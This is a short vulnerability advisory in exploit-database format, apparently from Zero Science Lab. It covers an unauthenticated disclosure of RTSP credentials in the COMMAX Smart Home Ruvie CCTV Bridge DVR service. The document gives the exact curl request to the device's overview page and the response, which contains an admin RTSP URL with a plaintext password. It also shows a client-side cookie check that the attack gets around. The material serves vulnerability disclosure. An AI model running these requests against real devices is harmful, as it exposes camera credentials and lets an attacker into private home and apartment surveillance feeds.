# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure# Date: 02.08.2021# Exploit Author: LiquidWorm# Vendor Homepage: https://www.commax.com
COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
02.08.2021--
$ curl http://TARGET:8086/overview.asp
<HTML><HEAD><TITLE> Infomation</TITLE><script src="https://www.exploit-db.com/exploits/50208/jquery.min.js"></script><script src="https://www.exploit-db.com/exploits/50208/jquery.cookie.js"></script><script src="https://www.exploit-db.com/exploits/50208/login_check.js"></script></HEAD><BODY><br><br><center><table><tr><td><li>[2021/08/1509:56:46]Started <BR><li> MAX USER :32<BR><li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554<BR></td></tr></table></center></BODY></HTML>
$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086","");
document.domain = server_domain;
var cookiesAuth = $.cookie("cookiesAuth");if(cookiesAuth !="authok"){
parent.document.location.href ="http://"+ server_domain +":8086/home.asp";}
